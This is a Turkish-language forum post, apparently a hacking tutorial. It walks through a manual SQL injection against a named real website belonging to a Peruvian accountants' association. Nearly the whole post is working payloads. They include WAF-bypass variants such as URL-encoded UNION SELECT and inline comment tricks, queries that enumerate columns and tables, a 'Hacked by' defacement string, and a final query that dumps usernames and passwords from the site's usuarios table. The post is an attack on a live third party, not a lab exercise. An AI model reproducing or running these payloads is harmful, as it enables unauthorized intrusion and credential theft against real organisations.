- 20 Mar 2023
- 5
- 0
Öncelikle Herkese Selamun Aleyküm Arkadaşlar
Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.
Örnek SQL İnjection içeren web sitemiz ;
http://jdccpp.org.pe/detalle-seminario.php?id=93%27
Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .
http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-
Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmayahangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A
dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-
Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-
sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-
evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-
Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-
burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-
Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.
